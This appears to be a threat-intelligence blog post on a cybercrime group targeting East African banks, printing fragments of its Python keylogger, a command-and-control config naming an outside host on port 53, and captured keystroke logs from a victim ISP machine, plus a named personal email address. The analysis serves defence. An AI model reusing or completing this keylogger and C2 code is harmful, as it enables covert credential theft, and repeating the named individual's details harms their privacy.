SilentCards threat group expands around East and Central Africa with an offshoot group born due to internal rivalry.

SilentCards, a threat group OnNet pursues, expands its intrusions around Central Africa after gaining footholds into several banks in Uganda, Tanzania and Rwanda. The threat group is an offshoot of the former Cyber Cartel discussed on this post.

The second in command of the former Cartel group branched off and formed this group which has raked out the biggest share in Cyber Crime across East Africa. The group has made out with around 2 Billion Kenya shillings from 2018 to mid 2019, targeting Saccos, Banks, Mobile Banking service providers, ISPs, Holding Companies, Hedge Funds, Betting Firms and Government financial sectors across East Africa.

Silentcards raked the biggest share in cyber crime underworld around EAfrica.

More money more problems – trouble started brewing at home.

The internal rivalry grew for a while until one of their senior team members, was arrested during a sting operation to uncover the insider recruitment tradecraft, after a device infiltration into one of the five largest banks in East Africa.

Immediately after this, a team of five SilentCards operatives branched out and started to run operations using SilentCards’ TTPs, which eventually began a long gang rivalry between the two groups. This new group is currently clustered and pursued as RuiruShepherds by OnNet Threat Intelligence Analysts, associated with several laptops they used, that were exploited and mapped to a Safehouse at Ruiru Estate, around June this year.

Later, SilentCards was observed to expand operations to Mozambique, Rwanda and Zambia in a span of three months.

The TTPs used by SilentCards are almost familiar with the former cartel’s tradecraft, only with a change on removing the Infilled laptop after gaining sustainable foothold.

During an Active Threat Interference mission, OnNet CNO teams managed to run enabling activities for collection of several tools used by SilentCards this year. On this post, OnNet CTI team shares new insights on the group’s current logger and backdoor.

The keylogger which is derived from the infamous HailMary, was spotted active from as early as January 2019, used by this threat group in the wild against two Saccos.

The logger is currently named LandCruizer keylogger by OnNet Reverse Engineering team for clustering the threat.

0c9d3c42a53fe8398213069cdbbd1759  Java.exe

This keylogger just like any other developed by SilentCards stores its logger data in %userprofile% of the targeted user with extension .tar.gz and uploads the data to drivehq, ftp account.

print "Time to ruuuuuuuuuuuuuuuuuuuun"
time.sleep(1)
print "Amuka"

parents, babies = (1, 1)
while babies < 100:
    print 'This generation has {0} babies'.format(babies)
    parents, babies = (babies, parents + babies)

#---------------------------------------------
LOGGED_IN=os.getenv('USERNAME')
FILE_NAME=os.getenv('userprofile')+"\\" +LOGGED_IN+".tar.gz"

Its OnKeyBoard definition matches the HailMary Keylogger used widely by Grapzone and other Advanced Financial Threat actors across East Africa.

def OnKeyboardEvent(event):
    global LOG_NEWACTIVE, LOG_ACTIVE, LOG_TEXT,MAIL_SENT
    LOG_NEWACTIVE=''
    wg=win32gui
    LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
    if LOG_NEWACTIVE != LOG_ACTIVE:
        #----------
        LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
        LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
        #-----------
        LOG_ACTIVE = LOG_NEWACTIVE
        print LOG_NEWACTIVE
#-----------------------
        f = open(FILE_NAME, 'a') # or 'w'?
        f.write("\n====================================================== \n")
        f.write("<Active Window: "+ " |<< "+event.WindowName+">> Date <<"+str(now)+">> HOST <<"+COMPUTER_NAME+ ">>
 USER <<"+ LOGGED_IN+'>>\n')
        f.write("\n-----------------------------------------------------------------------------------------------
------------------------- \n")
        f.close()
#-----------------------

Keylogger main is as below;

 main("land_cruiser");
    print "Threads running"
    """If this script is run as stand alone then call main() function."""

After the recruited insider is coached and manages to successfully implant the rogue laptop into the target infrastructure, the SilentCards’ operators swing into action through Teamviewer as a Remote Access Tool and commence deploying GoToMyPc across machines penetrated in the internal infrastructure until they reach their objective.

Another backdoor utilized is a tool derived from Aeshell backdoor called SeaDuke. This toolkit is deployed internally, inside the targeted infrastructure with the machine its implanted on, acting as a hop-relay of screenshots collection to a controlled C2 via NoIP, into Natted Servers hosted in Safehouses around Nairobi. The SeaDuke PE samples, collected by OnNet Threat Intelligence Analysts for the last few months, mapped to kitho.myftp.org that is registered to a user with a gmail account, kitho.koome@gmail.com. This same account is used in several heists to register GoToMyPC backdoors on an annually paid account from a VISA of a Bank account registered in Nakuru. This Gmail account also matches up with other email accounts, that show use of a VISA account managed by SilentCards leaders’ spouse.

# server config
HOST = 'kitho.myftp.org'
PORT = 53

# session controller

In some of the keylogger data collected from their servers after June 2019, the actors showed much more interest to Holding companies, Intellectual Property/Advertising Companies and Internet Service Providers. An example of a keylogger data below shows collected information against an Internet service provider, mid 2018, which progressed to more attacks in 2019.

Active Window:  |<< Pesapal Support - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-P
C 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------
------ 
====================================================== 
<Active Window:  |<< Start menu>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <
<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------
------ 
====================================================== 
<Active Window:  |<< Zuku Online Payment - Administration - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> 
HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------
------ 
====================================================== 
<Active Window:  |<< Subscribers 
 Wananchi CRM - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <
<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------
------ 
0 [ENT]
====================================================== 
<Active Window:  |<< 0 
 Subscribers 
 Wananchi CRM - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <
<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------
------ 
MUTE CALL....SYSTEM ISSUE, HAH
RRY, 19
27/6
====================================================== 
<Active Window:  |<< Start menu>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <
<DCM-7503-002>>

SilentCards, have managed to get access to several Small to Medium Enterprises, stealing small chunks of money in different heists in course of a month which doubles up what the other threat groups manage to cash out at the same estimated timeline, making this group the biggest earner of cyber crime in Eastern and Central Africa.

Speed is everything

This group has less Operation Security (OPSEC), than all the other groups we have observed.

Speed is everything when countering SilentCards Threat group.

Speed to evict them is essential before the hidden laptop goes online, after the rogue device is brought in and goes operational, removing their foothold even after unplugging the laptop is a gamble. Using CTI led Incidence Response on this threat group intrusions, can help protect the business operations for the customer and cultivate the business decisions during eradication and eviction of the adversaries.

Attribution matters, cyber is still subject to the laws of science, thus cyber being a signal, it can be intercepted, observed and tracked to its origins.

Leave a Reply

Your email address will not be published. Required fields are marked *